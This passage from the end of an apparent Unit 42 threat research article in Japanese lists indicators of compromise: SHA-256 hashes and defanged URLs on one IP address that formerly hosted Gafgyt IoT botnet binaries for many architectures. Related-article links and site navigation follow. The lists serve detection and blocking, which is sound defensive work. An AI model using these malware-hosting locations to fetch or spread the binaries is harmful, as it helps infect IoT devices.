9d37c617dacfef668548beee55a6b1d3899ffce3e7999d43159e228dcae1db01  
a4923ae6bf36a5c5507ed4e7f0c7b92524df04e132c1823e611ed584e5495186  
a61717a8c64301f20ac01f6fd7462d3303a72c9ed131fdd24cd6b12eb788377b  
a6d3081703359ee1879b2ce9c85d0c3f4ed4b319db6ecebd18054982bcf1603c  
ae7d250606c543b241b1809158a2668408c9ecaaf3ce4d51e08700f78534ce31  
b1cac267d0e3456f9da90955027e55ad1b78a7bf60f11914e959814c90ea7cc6  
b29334ca77f72587430fde00791daa1262972d315238d624e94238dda32e9240  
b34b43d240c89d1e9bbd9d99c6050afc7efa62323d7788a46801576c5b1de0ab  
b57b14f16c41a06b1f434f60cdc9bc380a4ff1ad5b7d8edc87c097cee6f3d233  
b8d284ba89b562923d1eed2e67517dc8772977decc49d5f82d75237d4a8937e6  
ba0d0e16b54aa6aaca3ab1ca2afa78148e823ae228d5f790e0279bb87dba5495  
bb5f7f92f4aa7cfdc0691037dc50549ccc705685bdd6f375c884bc68518b7e59  
bb9d7a86f107586dc8d99244a662c83c6f7667696b411292162dcb47d95d4c9b  
bc3eb0f7c8d4ecdacddac5d9ccc6ac44b6f6081f051d8890c5986faa37f56623  
bd5afefa044494010150501822f5f32be4300f482f8c8904d9fd1a30f5722fdd  
bdac2ed66c0f5633f5f12910bc9c03173be1fc51a76e495a36d700ba4ddc9da4  
c1ad4b2c0e71d2a92e4d9a4d2de01f750b8758fa3fe8a85631aaf870615b6769  
c30654f9bfd036f75a9c4a0f991f141243c821dbfc2b4d2ae308e68c4d232a57  
c86328964dfc86ca70c722e300f533bafaf234b2007867c6bf6a4e4be47cf8ca  
d049406662f083507dcd7278fa25bec0e93be06511ce290ed9ff309b514857a0  
d996a37b3bb09386b2e1e6a915b83c448065f0139d3c8057bf67e85d01ada9d1  
dc866393e6a549afd56d7a7a7411a4eff7f0cb37fe1964c4f87e4228d46c8eb2  
ddaa6c58ac7ed29166af6a337500ea5ca6ca54191a4176178e1cb1a351064c4e  
e3c250062292daaff815345e87fb9f28e7ac683338c58de7a3a9cc743f6200e6  
e5432946188a1c644e23159ae588797bd967ddc1f983956878e0ad0590efc73a  
e60451a0b5dd0b875263c8e7c74773971b0faba783957c2a305ddf5356c9d567  
e6156246bb85ca4a64377d3b68b6f34805b8a6a84890a9eada984fc29bfa36e1  
ec4eef0d92105d9b82888bce94f0a2e00988f3be1a6005c889b91afd7fd05835  
f01f85f9068f3c01193a0fb4b20a37573748914292a606da5cb2b5749b720366  
f32176c3799fd3bc3a2a24c162861d12f987db548e9ef94c3bc8c6156bcd4fe3  
f370a635db07bbd788991e898d8aa9be78ba0457cec3bd3e869ddc11e5693b5e  
f9bd8d0ae187a27d8d1ad54e8c8b551488f66141e4590ac7583cf470a2ab260d  
fab198f5f460b0591899bd218df79d2b50ec71ec2dd0494f1fa2bd07ba887aed  
fe92e66c0c5a4402972a3bf7473b98a13c067beddcba500443d194f022ca4194

### **以前GafgytをホスティングしていたURL**

hxxp://185.248\[.\]140.102/eeppinen.arm  
hxxp://185.248\[.\]140.102/eeppinen.arm7  
hxxp://185.248\[.\]140.102/eeppinen.armv4l  
hxxp://185.248\[.\]140.102/eeppinen.i586  
hxxp://185.248\[.\]140.102/eeppinen.i686  
hxxp://185.248\[.\]140.102/eeppinen.mips  
hxxp://185.248\[.\]140.102/eeppinen.mipsel  
hxxp://185.248\[.\]140.102/eeppinen.m68k  
hxxp://185.248\[.\]140.102/eeppinen.x86  
hxxp://185.248\[.\]140.102/eeppinen.ppc  
hxxp://185.248\[.\]140.102/eeppinen.sh4  
hxxp://185.248\[.\]140.102/eeppinen.sparc

### **Gafgytサンプルのハッシュ値**

070405b85448d15afe619584c3f3cc851ed43098f57ef88981edd22b663030e7  
19e2e20d994ba7c8af6537f640ef14459b66f333a7e5b28ef733ac81b43a628b  
36562e6f3917ea80fcd241bca96fe96eb4f7328b14afd2c4b528bef9ce4b21da  
573d539b78cdbb6d199d48ea986a5ba18c293253e48e2072e9871eb5460b2ae7  
5aede6d1b0376f2e8c3c292f39357137a32c8ff1a3c60c594775081707647f59  
6efb0d2304ce4c63205c6b502ba65a7f1b7eb87b055c0c5dcbb0120f49383588  
85ac0d7ce9c899ec12c8efff89f5fcb1ed8b87623bf6a1457d53f3d1dce5c71d  
c62c5d6255b6c1b5e8fa1861122adc180b36fbf4878f175e29367c7f6b08d7c9  
db5fae3cd9ac7338e3d9fe302ffe5e261a9cafca75458523343f3562a0362ae8  
dd1ab1f58494611af68d7d4dbe548234f0429b0f0c3d42135dce8f4339a16a7b  
e0d4f82f5d1a20ca447c26b454be18aa7478a853d3526317972cb6ca9d847f29  
e14ff28d2188ff0f665468bd0e17db21f3f11292b85c2a370596481cdf7c835f

トップに戻る

### タグ

* [Defense](https://unit42.paloaltonetworks.com/ja/tag/defense-ja/ "Defense")
* [Education](https://unit42.paloaltonetworks.com/ja/tag/education-ja/ "Education")
* [Finance](https://unit42.paloaltonetworks.com/ja/tag/finance-ja/ "Finance")
* [Government](https://unit42.paloaltonetworks.com/ja/tag/government-ja/ "Government")
* [Health care](https://unit42.paloaltonetworks.com/ja/tag/health-care-ja/ "health care")
* [High Tech](https://unit42.paloaltonetworks.com/ja/tag/high-tech-ja/ "High Tech")
* [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/ "IoT")
* [Linux](https://unit42.paloaltonetworks.com/ja/tag/linux-ja/ "Linux")
* [Mirai](https://unit42.paloaltonetworks.com/ja/tag/mirai-ja/ "Mirai")
* [Retail](https://unit42.paloaltonetworks.com/ja/tag/retail-ja/ "Retail")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:DNSトンネリング: 攻撃者はDNSをどう悪用するのか](https://unit42.paloaltonetworks.com/ja/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/ "DNSトンネリング: 攻撃者はDNSをどう悪用するのか")

### 目次

* 

### 関連記事

* [Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/ "article - table of contents")
* [Shadow Campaigns（シャドウ・キャンペーン）：世界規模のサイバースパイ活動の実態を暴く](https://unit42.paloaltonetworks.com/ja/shadow-campaigns-uncovering-global-espionage/ "article - table of contents")
* [2026年冬季オリンピックに対するロシアのサイバー脅威を理解する](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
